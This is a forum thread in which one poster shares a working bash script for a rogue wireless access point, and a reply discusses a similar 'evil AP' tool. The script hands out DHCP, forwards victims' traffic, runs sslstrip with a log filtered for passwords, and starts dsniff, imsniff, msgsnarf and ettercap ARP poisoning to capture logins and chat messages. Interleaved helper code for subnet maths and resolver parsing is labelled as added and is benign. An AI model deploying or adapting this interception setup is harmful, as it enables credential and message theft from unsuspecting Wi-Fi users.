Thread: Soft AP bash script

#1 (Join Date: Mar 2010)

    Hey guys

I was getting tired of typing all the commands in constantly, so I made a little bash script for it. It is made for Ubuntu, so a few changes will be needed; for example BT uses dhcpd instead of dhcpd3.

Now the problem: a lot of the time the other computers don't see the wireless when applied to interface mon or so.

### edit ###
Found that the problem only occurs with Windows XP.

Now the only thing that doesn't work (yet?) is the DNS service: the victim can't resolve DNS names but can access IP addresses directly.

Anyone here who has more experience with soft APs and is willing to help me?

    #!/bin/bash
    # SoftAP for wireless-testing
    # Modded by Junke1990
    # Hardware: Eee PC 1000h
    # NICs
    #  eth0 	(LAN)
    #  ra0 		(WLAN)		rt2860STA
    #  wlan1 	(USB WLAN)	RTL8170L	# dealextreme sku.27963
    #
    # init
    # The hard-coded addresses of the at0 side are not on the page as posted;
    # they are taken from the environment and the script refuses to start without them.
    AP_IP=${AP_IP:?set AP_IP (address of at0)}
    AP_MASK=${AP_MASK:?set AP_MASK (dotted netmask of the AP subnet)}
    AP_NET=${AP_NET:?set AP_NET (network address of the AP subnet)}
    AP_BCAST=${AP_BCAST:?set AP_BCAST (broadcast address of the AP subnet)}
    AP_RANGE_START=${AP_RANGE_START:?set AP_RANGE_START (first DHCP lease)}
    AP_RANGE_END=${AP_RANGE_END:?set AP_RANGE_END (last DHCP lease)}
    # path to sslstrip.py; edit if it is not on the PATH
    sslstrip=${sslstrip:-$(which sslstrip 2>/dev/null)}
    # services to listen on (1 = start, 0 = skip)
    dsn=1   # dsniff
    ims=1   # imsniff
    msg=1   # msgsnarf
    # Make sure only root can run our script
    if [[ $EUID -ne 0 ]]; then
      echo "This script must be run as root" 1>&2
      exit 1
    fi
    modprobe tun
    sleep 1
    echo "[>] Starting: Soft AP - Junke1990"
    # get interface and mac list (old-style ifconfig: "<if>  Link encap:... HWaddr <mac>")
    iflist=() maclist=()
    while read -r ifname mac; do
      iflist+=("$ifname")
      maclist+=("$mac")
    done < <(ifconfig -a | awk '/^[^ ]/ && $1 != "lo" {print $1,$5}')
    for i in "${!iflist[@]}"; do
      echo "$i: interface ${iflist[i]}, mac: ${maclist[i]}"
    done
    echo -n "[?] Select your inet conn. [#] "
    read -r j
    intI=${iflist[j]}
    intI_MAC=${maclist[j]}
    if [ -z "$intI" ]; then echo "[-] No such interface" 1>&2; exit 1; fi
    # select SoftAP adapter (everything except the inet connection)
    for i in "${!iflist[@]}"; do
      if [ "$j" != "$i" ]; then
        echo "$i: interface ${iflist[i]}, mac: ${maclist[i]}"
      fi
    done
    echo -n "[?] Select your SoftAP adapter. [#] "
    read -r k
    # MAC address of the SoftAP adapter becomes the BSSID of the fake AP
    intAP=${iflist[k]}
    intAP_MAC=${maclist[k]}
    if [ -z "$intAP" ] || [ "$k" = "$j" ]; then echo "[-] No such interface" 1>&2; exit 1; fi
    echo "[+] Gathering network info..."
    # info inet conn: address, netmask, first nameserver, default gateway, network
    intI_IP=$(ifconfig "$intI" | grep 'inet addr:' | cut -d: -f2 | awk '{ print $1 }')
    intI_mask=$(ifconfig "$intI" | grep 'Mask:' | awk '{ print $4 }' | cut -d: -f2)
    intI_DNS=$(awk '/^nameserver/ { print $2; exit }' /etc/resolv.conf)
    # default gateway: the 'route -n' line whose destination is 0.0.0.0
    intI_gw=$(route -n | awk '$1 == "0.0.0.0" && $2 != "0.0.0.0" { print $2; exit }')
    # network of the inet conn: the route on $intI that carries its netmask
    intI_netw=$(route -n | awk -v m="$intI_mask" -v i="$intI" '$3 == m && $NF == i { print $1; exit }')
    # converting netmask in to netmask length (count the leading ones of each octet)
    echo "[+] Calc'ing network mask..."
    MASK1=$(echo "$intI_mask" | cut -d. -f1)
    MASK2=$(echo "$intI_mask" | cut -d. -f2)
    MASK3=$(echo "$intI_mask" | cut -d. -f3)
    MASK4=$(echo "$intI_mask" | cut -d. -f4)
    BM1=$(echo "obase=2; $MASK1" | bc | sed 's/0.*$//' | tr -d '\n' | wc -m)
    BM2=$(echo "obase=2; $MASK2" | bc | sed 's/0.*$//' | tr -d '\n' | wc -m)
    BM3=$(echo "obase=2; $MASK3" | bc | sed 's/0.*$//' | tr -d '\n' | wc -m)
    BM4=$(echo "obase=2; $MASK4" | bc | sed 's/0.*$//' | tr -d '\n' | wc -m)
    intI_mask_nb=$(( BM1 + BM2 + BM3 + BM4 ))
    # enter wireless essid name
    echo -n "[?] Enter the desired name for wireless network: "; read -r ssid
    # prepare interface / softap
    #wlanconfig $intAP destroy
    #wlanconfig $intAP create wlanmode mon wlandev wifi0
    # put the adapter into monitor mode unless a monX interface was selected
    if ! echo "$intAP" | grep -q 'mon'; then
      intAP=$(airmon-ng start "$intAP" | grep "monitor mode " | awk '{ print $NF }' | sed 's/)//')
    fi
    echo "[+] Setting up fake AP..."
    sleep 1
    xterm -geometry 75x15 -e airbase-ng -W 1 -w "1234567890" -c 6 -e "$ssid" -a "$intAP_MAC" "$intAP" &
    sleep 1
    ifconfig at0 up
    ifconfig at0 "$AP_IP" netmask "$AP_MASK"
    ifconfig at0 mtu 1500
    route add -net "$intI_netw" netmask "$intI_mask" gw "$intI_gw"
    route add -net "$AP_NET" netmask "$AP_MASK" gw "$AP_IP"
    # monitor
    #xterm -e airodump-ng -c 6 --bssid $intAP_MAC $intAP &
    #xterm -e tshark -i 3 "not broadcast and not multicast" & # at0 = 3
    echo "[+] Killing dhcpd and dnsmasq..."
    # do this quiet for when the process isn't running
    killall -q dhcpd3
    killall -q dnsmasq
    echo "[+] Setting up DHCP config..."
    # create custom dhcpd.conf for WLAN: clients get at0 as router and the upstream nameserver
    # (dhcpd wants one comma-separated domain-name-servers list, not one statement per server)
    cat > dhcpd.conf << EOF
    ddns-update-style ad-hoc;
    default-lease-time 600;
    max-lease-time 7200;
    subnet $AP_NET netmask $AP_MASK {
      option subnet-mask $AP_MASK;
      option broadcast-address $AP_BCAST;
      option routers $AP_IP;
      option domain-name-servers $intI_DNS;
      range $AP_RANGE_START $AP_RANGE_END;
    }
    EOF
    echo "[+] Cleaning up IP tables..."
    # iptables cleanup
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    echo "[+] Setting up forwarding tables..."
    # iptables; every rule is scoped to at0 so traffic on the LAN side is left alone
    iptables -t nat -A PREROUTING -i at0 -p udp -j DNAT --to "$intI_gw" # all udp traffic (DNS only resolves if the gateway answers on 53)
    #iptables -t nat -A PREROUTING -i at0 -p udp --dport 53 -j DNAT --to $intI_DNS # DNS only
    iptables -t nat -A PREROUTING -i at0 -p tcp --destination-port 80 -j REDIRECT --to-port 8080  # send stuff to sslstrip
    #iptables -A FORWARD -i at0 -d $intI_netw/$intI_mask_nb -j DROP # protect LAN from WLAN; must precede the ACCEPT below
    iptables -A FORWARD --in-interface at0 -j ACCEPT # rogue gateway
    iptables -t nat -A POSTROUTING --out-interface "$intI" -j MASQUERADE # gateway to ext. router
    # ip_forward is enabled at the very end (see below)
    # start dhcp server for subnet
    # edit /etc/apparmor.d/usr.sbin.dhcp3 to allow dhcpd to read the config file if it keeps giving permission denied
    echo "[+] Setting up DHCP server..."
    xterm -geometry 75x10 -T DHCP -e dhcpd3 -d -f -cf dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.pid at0 &
    # dnsmasq is not started by this script; clients use the nameserver handed out by DHCP
    ### python-twisted-web2 required!!!
    if [ -n "$sslstrip" ] && [ -f "$sslstrip" ]; then
      echo "[+] Setting up sslstrip..."
      xterm -geometry 45x5 -e python "$sslstrip" -a -k -f -l 8080 &
      xterm -e tail -F sslstrip.log &
      xterm -e sh -c "tail -F sslstrip.log | grep 'pass'" &
      sleep 1
    else
      echo "[-] SSLStrip not found..."
      echo 'Edit $sslstrip to the correct path.'
    fi
    # DSniff
    if [ "$dsn" -eq 1 ]; then
      if which dsniff >/dev/null; then
        echo "[+] Setting up dsniff..."
        xterm -e dsniff -i at0 -m &
        sleep 1
      else
        echo "[-] DSniff not started..."
      fi
    fi
    # IMSniff - MSN only
    if [ "$ims" -eq 1 ]; then
      if which imsniff >/dev/null; then
        if [ ! -d IMlog ]; then
          mkdir IMlog
        fi
        # gives a lot of unknown content err's
        xterm -e sh -c "imsniff -cd IMlog at0 | grep -i -v 'unknown'" &
        sleep 1
      else
        echo "[-] IMSniff not started..."
      fi
    fi
    # MSGSnarf - AOL, ICQ, IRC, MSN, Yahoo
    if [ "$msg" -eq 1 ]; then
      if which msgsnarf >/dev/null; then
        echo "[+] Setting up msgsnarf..."
        xterm -e msgsnarf -i at0 &
        sleep 1
      else
        echo "[-] MSGSnarf not started..."
      fi
    fi
    # ettercap TCP Ports
    # IMAP  - 143/TCP 220/TCP (IMAP3) 993/TCP (IMAPS)
    # POP3  - 110/TCP 995/TCP
    # SMTP  - 25/TCP 465/TCP
    # SSL   - 443/TCP
    # HTTP  - 80/TCP
    # SSH   - 22/TCP
    # MSN   - 1863/TCP
    # Yahoo - 5050/TCP - nobody interesting uses yahoo...
    # ICQ   - 5190/TCP - nobody at all uses ICQ xD
    sleep 1
    echo "[+] Setting up ettercap..."
    # targets: any host on at0, limited to the ports above (the host ranges of the original are not on the page)
    xterm -e ettercap -T -i at0 -P autoadd -l ettercap -w ettercap.pcap -M arp // //25,80,110,143,220,443,465,993,995,1863 &
    sleep 1
    # ip_forward
    # as last to avoid reset
    echo "[+] Enabling IP forward..."
    echo "1" > /proc/sys/net/ipv4/ip_forward
    chk=$(cat /proc/sys/net/ipv4/ip_forward)
    if [ "$chk" != "1" ]; then
      echo "Can't enable ip_forward"
    fi
    echo "[x] All done! have fun!"
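The script above derives the upstream network by grepping `route -n` for the netmask and turns the mask into a prefix length with `bc`, trusting whatever `ifconfig` printed. The following is an added example, not part of the original post or of Junke1990's script: it computes prefix length, network and broadcast directly from an address/mask pair in plain POSIX sh, and rejects malformed addresses and non-contiguous masks (which the per-octet count in the script would silently miscount). The sample addresses in the usage comment are made up for the demonstration.

```sh
#!/bin/sh
# Added example (not from the original post): address/netmask arithmetic in POSIX sh.

# dotted quad -> 32-bit integer; returns 1 on anything that is not a.b.c.d with octets 0-255
ip2int() {
    case "$1" in
        *[!0-9.]*|*..*|.*|*.) return 1 ;;
    esac
    set -- $(IFS=.; printf '%s ' $1)
    [ $# -eq 4 ] || return 1
    for o in "$@"; do
        case "$o" in 0[0-9]*) return 1 ;; esac   # a leading zero would be read as octal
        [ "$o" -le 255 ] || return 1
    done
    echo $(( ($1 << 24) | ($2 << 16) | ($3 << 8) | $4 ))
}

# 32-bit integer -> dotted quad
int2ip() {
    echo "$(( ($1 >> 24) & 255 )).$(( ($1 >> 16) & 255 )).$(( ($1 >> 8) & 255 )).$(( $1 & 255 ))"
}

# netmask -> prefix length; returns 1 for a non-contiguous mask such as 255.0.255.0
mask2cidr() {
    m=$(ip2int "$1") || return 1
    n=0
    # length of the leading run of one bits
    while [ "$n" -lt 32 ] && [ $(( (m >> (31 - n)) & 1 )) -eq 1 ]; do
        n=$(( n + 1 ))
    done
    # every bit after that run must be zero
    [ $(( m & ((1 << (32 - n)) - 1) )) -eq 0 ] || return 1
    echo "$n"
}

# "<network>/<prefix> <broadcast>" for an address and its mask: the values the
# script needs for 'route add', 'ifconfig' and the dhcpd subnet declaration
subnet_info() {
    ip=$(ip2int "$1") || return 1
    mask=$(ip2int "$2") || return 1
    cidr=$(mask2cidr "$2") || return 1
    net=$(( ip & mask ))
    bcast=$(( net | (mask ^ 4294967295) ))
    echo "$(int2ip "$net")/$cidr $(int2ip "$bcast")"
}

# usage (made-up addresses):
#   subnet_info 192.168.1.37 255.255.255.0   -> 192.168.1.0/24 192.168.1.255
#   mask2cidr 255.0.255.0                    -> fails, exit status 1
```

Because every function signals bad input through its exit status, a script can guard the `route add` and `ifconfig` lines with `info=$(subnet_info "$intI_IP" "$intI_mask") || exit 1` instead of feeding an empty or garbage value into the routing table.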

#2 (Join Date: Jan 2010)


First off, I'm working on a similar script. Not just for an evil AP but also for some other wireless stuff. Search for "ubitack" on Google Code.

Regarding your DNS issue:
I'm not using dnsmasq. Instead I'm using the DNS server my system uses anyway. This is, inspired by one of Darkoperator's scripts, my way to generate the dhcpd.conf:

    for d in $(sed -r 's/^.* ([0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}).*$/\1/' /etc/resolv.conf | grep -E '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}'); do
      echo "option domain-name-servers $d;" >> $DHCPDCONF
    done

A question regarding ettercap. You are using ARP poisoning. IMHO you don't need to ARP poison as you are already in control of the traffic. You have your kernel forwarding packets. I'm using ettercap with the evil AP in non-offensive mode:

    ettercap -T -q -p -u -z -m ${LOGFOLDER}ettercap_evilap.log -i $wint >> $LOGFILE 2>&1

A last question: why aren't you using airbase-ng for your evil AP?
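The loop in #2 writes one `option domain-name-servers` statement per address it finds in resolv.conf, and its regex also matches addresses on comment and `search` lines. The following is an added example written for this thread, not code from the poster or from ubitack: it keeps only `nameserver` lines, drops loopback resolvers (a 127.x.x.x stub on the AP host is unreachable from wireless clients) and duplicates, and emits the single comma-separated statement dhcpd expects, since a repeated option statement in the same scope replaces rather than extends the earlier one. The resolv.conf in `demo` is constructed for the example, with documentation-range addresses.

```sh
#!/bin/sh
# Added example (not from the original post): dhcpd nameserver option from resolv.conf.

# Print the usable nameservers from a resolv.conf, one per line:
# comments and non-nameserver lines skipped, loopback and duplicates dropped.
resolv_nameservers() {
    awk '
        /^[ \t]*#/ || /^[ \t]*;/ { next }                 # comment lines
        $1 == "nameserver" && $2 ~ /^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$/ {
            if ($2 ~ /^127\./) next                      # loopback: clients cannot reach it
            if (!seen[$2]++) print $2                    # first occurrence only
        }' "$1"
}

# One dhcpd statement with the servers as a comma-separated list.
# Returns 1 (and prints nothing) when no usable server was found, so the caller
# does not write a dhcpd.conf that hands clients an empty resolver list.
dhcpd_dns_option() {
    list=$(resolv_nameservers "$1" | awk 'NR > 1 { printf ", " } { printf "%s", $0 } END { print "" }')
    [ -n "$list" ] || return 1
    printf 'option domain-name-servers %s;\n' "$list"
}

# Demo on a constructed resolv.conf (addresses from the documentation ranges).
demo() {
    tmp=$(mktemp)
    cat > "$tmp" <<'EOF'
# Generated by NetworkManager (sample, constructed for this example)
search example.lan
nameserver 127.0.0.1
nameserver 192.0.2.53
nameserver 192.0.2.53
nameserver 198.51.100.2
EOF
    dhcpd_dns_option "$tmp"
    rm -f "$tmp"
}

# usage: dhcpd_dns_option /etc/resolv.conf >> "$DHCPDCONF" || echo "no usable resolver" >&2
```

In the script from #1 this replaces the three bare `option domain-name-servers` lines inside the `subnet` block; the statement goes inside that block, where dhcpd applies it to the wireless clients.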
